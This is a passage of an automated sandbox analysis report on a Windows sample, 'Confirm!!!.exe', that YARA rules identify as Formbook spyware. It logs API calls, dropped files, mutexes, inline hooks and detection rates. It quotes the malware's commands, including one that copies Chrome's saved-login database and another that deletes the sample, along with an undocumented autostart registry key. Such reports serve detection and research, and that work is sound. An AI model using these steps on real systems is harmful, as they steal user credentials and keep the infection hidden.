          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0087B42E NtOpenThreadToken,NtOpenProcessToken,NtClose,8_2_0087B42E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_00896D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,8_2_00896D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0089B5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,8_2_0089B5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_00899AB4 NtSetInformationFile,8_2_00899AB4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_008783F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,8_2_008783F2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069B00 NtSetValueKey,LdrInitializeThunk,8_2_03069B00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069710 NtQueryInformationToken,LdrInitializeThunk,8_2_03069710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069770 NtSetInformationFile,LdrInitializeThunk,8_2_03069770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069780 NtMapViewOfSection,LdrInitializeThunk,8_2_03069780
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069FE0 NtCreateMutant,LdrInitializeThunk,8_2_03069FE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069A50 NtCreateFile,LdrInitializeThunk,8_2_03069A50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_030696D0 NtCreateKey,LdrInitializeThunk,8_2_030696D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_030696E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_030696E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_03069910
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069540 NtReadFile,LdrInitializeThunk,8_2_03069540
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069560 NtWriteFile,LdrInitializeThunk,8_2_03069560
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_030699A0 NtCreateSection,LdrInitializeThunk,8_2_030699A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_030695D0 NtClose,LdrInitializeThunk,8_2_030695D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069840 NtDelayExecution,LdrInitializeThunk,8_2_03069840
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069860 NtQuerySystemInformation,LdrInitializeThunk,8_2_03069860
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0306A710 NtOpenProcessToken,8_2_0306A710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069730 NtQueryVirtualMemory,8_2_03069730
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069760 NtOpenProcess,8_2_03069760
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0306A770 NtOpenThread,8_2_0306A770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_030697A0 NtUnmapViewOfSection,8_2_030697A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0306A3B0 NtGetContextThread,8_2_0306A3B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069A00 NtProtectVirtualMemory,8_2_03069A00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069610 NtEnumerateValueKey,8_2_03069610
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069A10 NtQuerySection,8_2_03069A10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069A20 NtResumeThread,8_2_03069A20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069650 NtQueryValueKey,8_2_03069650
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069660 NtAllocateVirtualMemory,8_2_03069660
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069670 NtQueryInformationProcess,8_2_03069670
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069A80 NtOpenDirectoryObject,8_2_03069A80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069520 NtWaitForSingleObject,8_2_03069520
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0306AD30 NtSetContextThread,8_2_0306AD30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069950 NtQueueApcThread,8_2_03069950
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_030699D0 NtCreateProcessEx,8_2_030699D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_030695F0 NtQueryInformationFile,8_2_030695F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069820 NtEnumerateKey,8_2_03069820
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0306B040 NtSuspendThread,8_2_0306B040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_030698A0 NtWriteVirtualMemory,8_2_030698A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_030698F0 NtReadVirtualMemory,8_2_030698F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_00886550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,8_2_00886550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0088374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,8_2_0088374E
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 0_2_02D6C21C0_2_02D6C21C
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 0_2_02D6EBF80_2_02D6EBF8
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 0_2_02D6EBE90_2_02D6EBE9
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_0041D9F92_2_0041D9F9
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_0041C9812_2_0041C981
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_0041DA6F2_2_0041DA6F
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_0041CAB72_2_0041CAB7
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_0041DB432_2_0041DB43
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_0041DDC92_2_0041DDC9
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_0041D5AD2_2_0041D5AD
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_00409F5E2_2_00409F5E
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_00409F602_2_00409F60
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_0041CFCE2_2_0041CFCE
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_008748E68_2_008748E6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_00895CEA8_2_00895CEA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_00879CF08_2_00879CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0087D8038_2_0087D803
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0087E0408_2_0087E040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_008771908_2_00877190
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_008931DC8_2_008931DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_008935068_2_00893506
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_008865508_2_00886550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_008819698_2_00881969
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_00878AD78_2_00878AD7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_008752268_2_00875226
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0087FA308_2_0087FA30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_00875E708_2_00875E70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_00885FC88_2_00885FC8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_00896FF08_2_00896FF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0087CB488_2_0087CB48
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0305EBB08_2_0305EBB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03046E308_2_03046E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0302F9008_2_0302F900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03020D208_2_03020D20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_030441208_2_03044120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_030F1D558_2_030F1D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_030E10028_2_030E1002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0303841F8_2_0303841F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0303B0908_2_0303B090
          Source: ms9r74an.exe.3.drStatic PE information: Resource name: RT_VERSION type: AKT archive data
          Source: Confirm!!!.exe, 00000000.00000000.238223791.0000000000B40000.00000002.00020000.sdmpBinary or memory string: OriginalFilename3 vs Confirm!!!.exe
          Source: Confirm!!!.exe, 00000000.00000002.254392668.0000000006030000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs Confirm!!!.exe
          Source: Confirm!!!.exe, 00000002.00000000.246642206.0000000000A90000.00000002.00020000.sdmpBinary or memory string: OriginalFilename3 vs Confirm!!!.exe
          Source: Confirm!!!.exe, 00000002.00000002.288732684.000000000177F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Confirm!!!.exe
          Source: Confirm!!!.exe, 00000002.00000002.288963096.000000000196D000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Confirm!!!.exe
          Source: Confirm!!!.exeBinary or memory string: OriginalFilename3 vs Confirm!!!.exe
          Source: 00000002.00000002.288073029.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.288073029.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.288390051.0000000001060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.288390051.0000000001060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.506851643.00000000028F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.506851643.00000000028F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.505585690.0000000000820000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.505585690.0000000000820000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.288371547.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.288371547.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.507682099.0000000002AA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.507682099.0000000002AA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.251271750.0000000003E7F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.251271750.0000000003E7F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Confirm!!!.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Confirm!!!.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Confirm!!!.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Confirm!!!.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: ms9r74an.exe.3.drStatic PE information: Section: .reloc ZLIB complexity 1.021484375
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/9@10/1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0087C5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,8_2_0087C5CA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0089A0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,8_2_0089A0D2
          Source: C:\Windows\explorer.exeFile created: C:\Program Files (x86)\FjdftnbgpJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Confirm!!!.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
          Source: C:\Users\user\Desktop\Confirm!!!.exeMutant created: \Sessions\1\BaseNamedObjects\gJEYWsWfigSZWpy
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_01
          Source: C:\Windows\explorer.exeFile created: C:\Users\user~1\AppData\Local\Temp\FjdftnbgpJump to behavior
          Source: Confirm!!!.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Confirm!!!.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\-Q928--Q\-Q9logri.iniJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Confirm!!!.exeVirustotal: Detection: 25%
          Source: Confirm!!!.exeReversingLabs: Detection: 37%
          Source: unknownProcess created: C:\Users\user\Desktop\Confirm!!!.exe 'C:\Users\user\Desktop\Confirm!!!.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Confirm!!!.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Confirm!!!.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Program Files (x86)\Fjdftnbgp\ms9r74an.exe C:\Program Files (x86)\Fjdftnbgp\ms9r74an.exe
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess created: C:\Users\user\Desktop\Confirm!!!.exe {path}Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Fjdftnbgp\ms9r74an.exe C:\Program Files (x86)\Fjdftnbgp\ms9r74an.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Confirm!!!.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /VJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3ad05575-8857-4850-9277-11b85bdb8e09}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile written: C:\Users\user\AppData\Roaming\-Q928--Q\-Q9logri.iniJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Confirm!!!.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Confirm!!!.exeStatic file information: File size 1065472 > 1048576
          Source: Confirm!!!.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmd.pdbUGP source: Confirm!!!.exe, 00000002.00000002.288927299.0000000001920000.00000040.00000001.sdmp, cmd.exe, 00000008.00000002.505873139.0000000000870000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Confirm!!!.exe, 00000002.00000002.288548152.00000000015EF000.00000040.00000001.sdmp, cmd.exe, 00000008.00000002.509517290.000000000311F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Confirm!!!.exe, 00000002.00000002.288548152.00000000015EF000.00000040.00000001.sdmp, cmd.exe
          Source: Binary string: cmd.pdb source: Confirm!!!.exe, 00000002.00000002.288927299.0000000001920000.00000040.00000001.sdmp, cmd.exe

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: Confirm!!!.exe, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Confirm!!!.exe.a50000.0.unpack, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.Confirm!!!.exe.a50000.0.unpack, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.Confirm!!!.exe.9a0000.0.unpack, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.Confirm!!!.exe.9a0000.1.unpack, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: ms9r74an.exe.3.dr, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 28.2.ms9r74an.exe.3b0000.0.unpack, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 28.0.ms9r74an.exe.3b0000.0.unpack, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 0_2_02D6BBB5 push F4053728h; ret 0_2_02D6BBC5
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_00408047 push FFFFFF9Fh; iretd 2_2_0040804A
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_004182EB push ds; retf 2_2_004182EE
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_0041DC8C push ebx; ret 2_2_0041DD55
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_0041DD56 push ebx; ret 2_2_0041DD55
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_004165F7 push BC1E6DA9h; retf 2_2_004165FC
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_0041CE19 push edx; ret 2_2_0041CF3C
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_0041C6F2 push eax; ret 2_2_0041C6F8
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_0041C6FB push eax; ret 2_2_0041C762
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_0041C6A5 push eax; ret 2_2_0041C6F8
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_0041C75C push eax; ret 2_2_0041C762
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_008876BD push ecx; ret 8_2_008876D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_008876D1 push ecx; ret 8_2_008876E4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0307D0D1 push ecx; ret 8_2_0307D0E4
          Source: C:\Windows\explorer.exeFile created: C:\Program Files (x86)\Fjdftnbgp\ms9r74an.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Fjdftnbgp\ms9r74an.exeJump to dropped file

          Boot Survival:

          barindex
          Creates an undocumented autostart registry key Show sources
          Source: C:\Windows\SysWOW64\cmd.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C6QLPDJ0Jump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xC3 0x36
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess info